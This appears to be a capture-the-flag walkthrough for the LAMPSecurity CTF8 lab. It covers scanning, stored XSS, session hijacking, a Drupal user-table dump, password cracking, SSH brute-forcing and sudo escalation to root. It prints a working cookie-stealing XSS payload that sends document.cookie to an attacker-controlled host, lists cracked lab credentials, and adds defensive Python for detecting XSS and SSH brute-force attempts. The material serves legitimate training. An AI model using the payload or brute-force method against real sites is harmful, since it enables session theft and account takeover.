April 28, 2019

LAMP Security CTF8 Walkthrough



In this article I am going to capture the flags for the LampSecurity CTF 8 challenge. This is a beginner-level challenge. We will start with scanning the environment and end with getting root access; in between, my target will be to capture the hidden flags. So let’s get started.

List of actions:

  • Scan the network
  • HTTP enumeration
  • Web vulnerability scanning
  • Spidering Web directory
  • Session hijack
  • Crack the password
  • Brute-forcing SSH credentials
  • Get the access and capture the flags
  • Root privilege

Before starting the scan, let’s discover the network first with netdiscover.


We have successfully discovered our target.



1      Scan the network
We will start with a network scan using nmap. For this, let’s execute the below command in the Kali console.



From the result we found that the following ports are open.

- 21
- 22
- 25
- 80
- 110
- 111
- 139
- 143
- 443
- 445
- 993
- 995
- 3306
- 5801,5802,5901,5902,5903,5904
- 6001,6002,6004,6003

Based on the above result, it is confirmed that there is a web application running on port 80, so we will choose that as our starting point.



2      Web vulnerability scanning
Let’s scan the web application with Nikto and try to discover the vulnerabilities present.



After the scan we got the below results, which are important for the rest of the walkthrough.
- The Phpinfo.php page is accessible



- The application is vulnerable to XSS attack.



Now, while exploring the web application, let’s check the source code of the home page.



We have successfully captured our first flag.
#flag#550e1bafe077ff0b0b67f4e32f29d751

After getting the first flag, we will go back to the Nikto result and explore the phpinfo page.



Great!! We have got our second flag in a row.

#flag#550e1bafe077ff0b0b67f4e32f29d751

3      Spidering Web directory
Now come to the home page and read any of the articles to get a further clue.



While exploring the page I found a new directory which was not displayed during the vulnerability scan. So we will scan the directory using dirb to get any useful information.



In the scan result I found something different, which pushed me to check further.


Let’s try to explore the above path and see what else we can get.



Bingo! We have got our third flag
#flag#57dbe55b42b307fb4115146d239955d0

4      Session hijack
Now let’s create a user account to get user access.



I have successfully created one user named “iamuser”. Now go to any of the blog posts and check if the comment section is vulnerable to XSS.

Enter the below script and click on preview:
<script>alert('hi')</script>



From the above result it is clear the application is vulnerable to XSS.

Now we will try to hijack the session cookie of the writer of the blog and forward it to a cookie capture application running on our own server. To know more, please read my previous article.

To do this, paste the below HTML code inside the comment box and save it.

<html>
<body>
<b> wanteddev</b>
<u>click me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.1.2/Cookie_stealer.php?c="+document.cookie)> </iframe >
</body>
</html>



Now the above code will give us the session ID of whoever visits the comment in the first place. Here we will make the blog writer visit the link to get the cookie ID and hijack his session. To do that, we will send the link to him via email and wait until he clicks on the link.

Now click on the username.



After that you have to paste the link in the contact form and send it to the user.



Now wait for a couple of minutes and we will get the session ID on our server.

We have successfully got the session ID.

 

Now we will try to get the session by pasting the copied session ID using the cookie manager Firefox plugin.
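
The hijack above depends on two conditions: the comment body is rendered as markup, and the session cookie is readable through document.cookie. The following Python code is an added example, not part of the original walkthrough; it flags active content in stored comments, encodes them for output, and checks whether a Set-Cookie header lacks HttpOnly. The comment samples, the cookie name SESSdemo and the host collector.example are constructed placeholders.

```python
import html
from html.parser import HTMLParser

ACTIVE_TAGS = {"script", "iframe", "object", "embed"}

class ActiveContentFinder(HTMLParser):
    """Collects markup in a comment that a browser would execute or load."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"active tag <{tag}>")
        for name, value in attrs:
            value = (value or "").strip().lower()
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            if value.startswith("javascript:"):
                self.findings.append(f"javascript: URI in {name} on <{tag}>")
            if "document.cookie" in value:
                self.findings.append(f"cookie access in {name} on <{tag}>")

def scan_comment(body):
    """Return findings for one stored comment (empty list: none of these rules hit)."""
    finder = ActiveContentFinder()
    finder.feed(body)
    finder.close()
    return finder.findings

def render_comment(body):
    """Mitigation 1: encode on output so the comment is displayed as text."""
    return html.escape(body, quote=True)

def script_readable(set_cookie_header):
    """Mitigation 2 check: True if the cookie lacks the HttpOnly flag."""
    flags = [part.strip().lower() for part in set_cookie_header.split(";")[1:]]
    return "httponly" not in flags

# Constructed samples that mirror the shape of the comments used in this post.
COMMENTS = {
    "benign": "Nice article, <b>thanks</b>!",
    "probe": "<script>alert('hi')</script>",
    "exfil": "<u>click me</u><iframe height=0 width=0 "
             "src='javascript:void(document.location="
             "\"http://collector.example/c?c=\"+document.cookie)'></iframe>",
}

if __name__ == "__main__":
    for label, body in COMMENTS.items():
        print(label, scan_comment(body))
        print("  rendered as:", render_comment(body))
    print("readable by script:", script_readable("SESSdemo=abc123; path=/"))
```
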



Now our next step will be to post the SQL query and try to fetch the user details.

As we know, Drupal’s default table is user and the columns for user and password are user, pass respectively.

So please go to content management and create content, then click on page. Now copy and paste the below SQL with PHP code, select the content type as PHP and then click on preview.



You will successfully get the current user details with the MD5 password hash.



5      Crack the password
Save it in a file and try to crack it using the John the Ripper tool.


After the cracking process we got the below results.



6      Brute-forcing SSH credentials
Let’s save the users and passwords in separate files for our next step, which is brute-forcing the SSH login.

After that, let’s execute the below command in the terminal.


And wait to get a success message.



So sad, we did not get any success. Still, there is no need to worry; let’s explore the blogger profile and see if we get any further hint.



From the above screenshot we can see that the user Steve has his user name in the email as spinkton. Similarly, we will check each and every user profile by editing the URL and store the user names inside a file.



Now let’s try to brute-force again with the new user list.


This time we have got three successful credentials, as follows:

bdio – passw0rd
jharraway – letmein!
spinkton – football123
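
On the server side, this kind of list-based guessing leaves a clear trail in the sshd log: many failed passwords from one source across several accounts, followed by accepted logins. The following Python code is an added example, not part of the original walkthrough, that reports such sources and the accounts that were accepted after the failures. The log lines are constructed in OpenSSH's syslog format (host name, PIDs, times and ports are made up), and the thresholds are assumptions to tune.

```python
import re
from collections import defaultdict

# Constructed sample log; only the line format is OpenSSH's.
SAMPLE_LOG = """\
Apr 28 10:01:01 ctf8 sshd[2101]: Failed password for invalid user admin from 192.168.1.2 port 40110 ssh2
Apr 28 10:01:02 ctf8 sshd[2102]: Failed password for root from 192.168.1.2 port 40112 ssh2
Apr 28 10:01:03 ctf8 sshd[2103]: Failed password for bdio from 192.168.1.2 port 40114 ssh2
Apr 28 10:01:04 ctf8 sshd[2104]: Failed password for jharraway from 192.168.1.2 port 40116 ssh2
Apr 28 10:01:05 ctf8 sshd[2105]: Failed password for spinkton from 192.168.1.2 port 40118 ssh2
Apr 28 10:01:06 ctf8 sshd[2106]: Failed password for bdio from 192.168.1.2 port 40120 ssh2
Apr 28 10:01:07 ctf8 sshd[2107]: Accepted password for bdio from 192.168.1.2 port 40122 ssh2
Apr 28 10:01:08 ctf8 sshd[2108]: Failed password for jharraway from 192.168.1.2 port 40124 ssh2
Apr 28 10:01:09 ctf8 sshd[2109]: Accepted password for spinkton from 192.168.1.2 port 40126 ssh2
Apr 28 10:05:00 ctf8 sshd[2200]: Failed password for jharraway from 192.168.1.50 port 51000 ssh2
Apr 28 10:05:09 ctf8 sshd[2201]: Accepted password for jharraway from 192.168.1.50 port 51002 ssh2
"""

LINE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) "
    r"from (\S+) port \d+"
)

def analyse(log_text, min_failures=5, min_users=3):
    """Report sources that guessed at many accounts, and what they got into."""
    failures = defaultdict(int)      # source -> failed attempts so far
    users = defaultdict(set)         # source -> distinct account names tried
    accepted = defaultdict(list)     # source -> accounts accepted after guessing
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue
        outcome, user, src = m.groups()
        if outcome == "Failed":
            failures[src] += 1
            users[src].add(user)
        elif failures[src] >= min_failures and len(users[src]) >= min_users:
            # A success after a guessing run: treat the account as compromised.
            if user not in accepted[src]:
                accepted[src].append(user)
    report = {}
    for src, count in failures.items():
        if count >= min_failures and len(users[src]) >= min_users:
            report[src] = {
                "failures": count,
                "users_tried": len(users[src]),
                "accepted_after": accepted.get(src, []),
            }
    return report

if __name__ == "__main__":
    for src, info in analyse(SAMPLE_LOG).items():
        print(src, info)
```

A single mistyped password followed by a normal login, like the 192.168.1.50 entries in the sample, stays below both thresholds and is not reported.
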

7      Get the access and capture the flags

Let’s try to log in with them one by one.





Great, we have got another flag here.






Now try to log in with the next credential. Nice! We have got another flag inside this.



Let’s move to the next credential. Again! We have got one more flag inside.



8      Root privilege
After all this, let’s try a sudo login to check if this user has root privilege.



Awesome!! We have successfully got the root user.
Thanks for reading my article. Please let me know your valuable feedback in the comment section below.







